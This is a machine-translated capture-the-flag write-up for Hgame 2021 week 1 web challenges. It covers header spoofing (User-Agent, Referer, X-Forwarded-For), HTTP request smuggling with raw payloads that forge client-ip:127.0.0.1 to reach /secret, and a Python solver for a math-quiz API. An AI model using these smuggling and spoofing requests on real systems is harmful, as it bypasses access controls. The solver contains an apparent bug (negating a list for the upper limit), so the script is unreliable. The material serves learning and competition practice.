Hgame2021 week1 web

Preface

The first time I played Hgame, the topics were very interesting and I learned a lot. I thought that the first week’s topic was very simple, but I found that I was too vicious. There are 3 questions (in fact, 2 questions) that are my own knowledge blind spots. The official WP has also come out, so I can learn by myself.
But there is one thing to say. . Why do I feel that the web questions in the second week are easier than those in the first week. . . Fortunately, only one XSS question was the front-end question in the second week. Just the GG question, the other back-end questions were quite simple.
It can be seen from the first week that I still don’t know much about front-end and HTTP protocol, so I have to learn it slowly.

Hitchhiking_in_the_Galaxy

Mainly inspect the HTTP protocol, the first week is mainly to inspect HTTP and front-end, but these are things that I don't know much about. . .
Enter HitchhikerGuide.php, prompt 405 Method Not Allowed. So change to POST.
Then you are prompted to access here only by using "Infinite Improbability Drive".
Change the UA header: User-Agent: Infinite Improbability Drive
and then this:

你知道吗？<a href="https://github.com/wuhan005">茄子</a>特别要求：你得从他的<a href="https://cardinal.ink/">Cardinal</a>过来

Then change Referer:Referer:https://cardinal.ink/

Finally, if you prompt local access to get the flag, use the xff header: x-forwarded-for:127.0.0.1
get the flag. They are all common postures.

watermelon

For the game of Big Watermelon, it is normal to review the JS code, find the final condition for success, and then manually succeed or read the flag directly. But for this question, I searched the JS code all over and still couldn't find the JS code that finally judged 2000 points.
You can refer to Yibo Zhihu: Is there any trick for the mini game "Synthetic Big Watermelon"?
I don't know the front end, and I really don't know the JS code can be found here: The

key code is in project.js:

decode the base64 to get the flag. After learning what I have learned, the front end will not be too miserable. . .

Treasure smuggler

The knowledge point investigated is HTTP smuggling, which is also a knowledge blind zone. It is wonderful to learn new things.
The reference article is the hint, written in super detail, and learned a lot: Protocol layer attack-HTTP request smuggling

After reading that article, you can have a certain understanding. You can think of using CL-TE attacks or attacking with the posture of the first patch mentioned in the article:

But I didn’t succeed at that time, so I was very confused. . After WP came out, I followed the WP of the masters to reproduce a wave, the request is exactly the same, but still can not succeed, thief fan. In the end, it was discovered that bp's automatic update content-length needs to be turned off:

after turning it off and then reproducing, it can be successful.
The first is the attack with a blank space behind the content-length. The specific principle article is also very clear, that is, when there is a field between the request field and: in the request received by the ATS server, it does not return 400 or make corrections, but directly sends it to the back-end server. The back-end server, such as nginx, will ignore the content-length when encountering such a request, resulting in the request actually seen by the back-end server:

GET / HTTP/1.1
Host: thief.0727.site


GET /secret HTTP/1.1
Host:thief.0727.site
client-ip:127.0.0.1
foo:

Will be treated as 2 requests. The first request is a complete one because it has \r\n at the end. There is no \r\n at the end of the second request, so the backend server considers it to be incomplete. At this time, it will respond to the first request, and then wait for the subsequent data transfer to complete before responding to the second one.
At this time, we request one more time and it is spliced ​​like this:

GET /secret HTTP/1.1
Host:thief.0727.site
client-ip:127.0.0.1
foo:GET / HTTP/1.1
Host: thief.0727.site

It was a successful request, and HTTP smuggling was successful.

CL-TE attacked me, too. . . Follow the masters and the official WP still can't come out. . .

Smuggler's anger

In order to prevent a hitchhike, add a question. Still try the attack method with a space between content-length and:, but it will report 400. The masters say it is because of the problem of the two Hosts. For this question, it will add client-ip by itself:

GET / HTTP/1.1
Host: police.liki.link
Content-Length : 71


GET /secret HTTP/1.1
Client-ip:127.0.0.1
Host: police.liki.link
a:

It might look like this:

GET / HTTP/1.1
Host: police.liki.link
Content-Length : 71


GET /secret HTTP/1.1
Client-ip:127.0.0.1
Host: police.liki.link
a:GET / HTTP/1.1
Host: police.liki.link
client-ip:xxxxxx

The following client-ip will cover our construction, and two hosts will report a 400 error. The masters put more content in the request body of the request we constructed:

GET / HTTP/1.1
Host: police.liki.link
Content-Length : 94


GET /secret HTTP/1.1
Client-ip:127.0.0.1
Host: police.liki.link
Content-length:100

aaa

In this way, the content of the second request was spliced ​​in the request body of GET /secret HTTP/1.1, and the smuggling was successful:

However, the CL-TE of these two questions was unsuccessful in my trial, and even the same payload was copied and printed. It doesn't work, maybe there is something wrong with my local area, there is no way.

IQ test chicken

In fuckmath.js, you can see the useful js code, judge the status, get the flag, get the question and submit the answer, and the api is written very clearly.
Getquestion got roughly like this:

<math>
	<mrow>
		<msubsup>
			<mo>∫</mo>
			<mrow>
				<mo>-</mo>
				<mn>92</mn>
			</mrow>
			<mrow>
				<mn>31</mn>
			</mrow>
		</msubsup>
		
		<mo>(</mo>
		<mn>12</mn>
		<mi>x</mi>
		<mo>+</mo>
		<mn>17</mn>
		<mo>)</mo>
		<mtext>
			<mi>d</mi>
		</mtext>
		<mi>x</mi>
		<mtd/>
	</mrow>
</math>

Considering that the integral forms are all ax+b, the formulas are the same, in fact, it can be calculated by hand (escape). Of course, writing the script is very simple. Read the upper and lower limits of the points and a and b, and then the formula for setting the points is finished. I wrote it that way, but when I wrote WP, I found that the script had been deleted. . .
I took a look at WP and used python's sympy library to calculate points. I also learned to rewrite a script.

# @Author:feng
import requests
from sympy import *
from lxml import etree
import json
url="http://r4u.top:5000/"
session=requests.session()
count=0
while count<100:
    question=session.get(url=url+"api/getQuestion")
    question=json.loads(question.text)['question']
    question=etree.HTML(question)

    xia_fuhao=question.xpath('//math/mrow/msubsup/mrow[1]/mo/text()')
    xiaxian=int(question.xpath('//math/mrow/msubsup/mrow[1]/mn/text()')[0])
    if len(xia_fuhao)!=0:
        xiaxian=-xiaxian
    shang_fuhao=question.xpath('//math/mrow/msubsup/mrow[2]/mo/text()')
    shangxian=int(question.xpath('//math/mrow/msubsup/mrow[2]/mn/text()')[0])
    if len(shang_fuhao)!=0:
        shangxian=-shang_fuhao

    a=int(question.xpath('//math/mrow/mn[1]/text()')[0])
    b=int(question.xpath('//math/mrow/mn[2]/text()')[0])

    x=symbols('x')
    x=float(integrate(a*x+b,(x,xiaxian,shangxian)))
    headers = {
    
    
        "Content-Type": "application/json;charset=UTF-8"
    }
    data={
    
    
        'answer':x
    }
    r=session.post(url=url+"api/verify",headers=headers,json=data)
    #print(r.text)
    count+=1
r=session.get(url=url+"api/getFlag")
print(r.text)

Also refer to the script of this master:
hgame2021 week1 writeup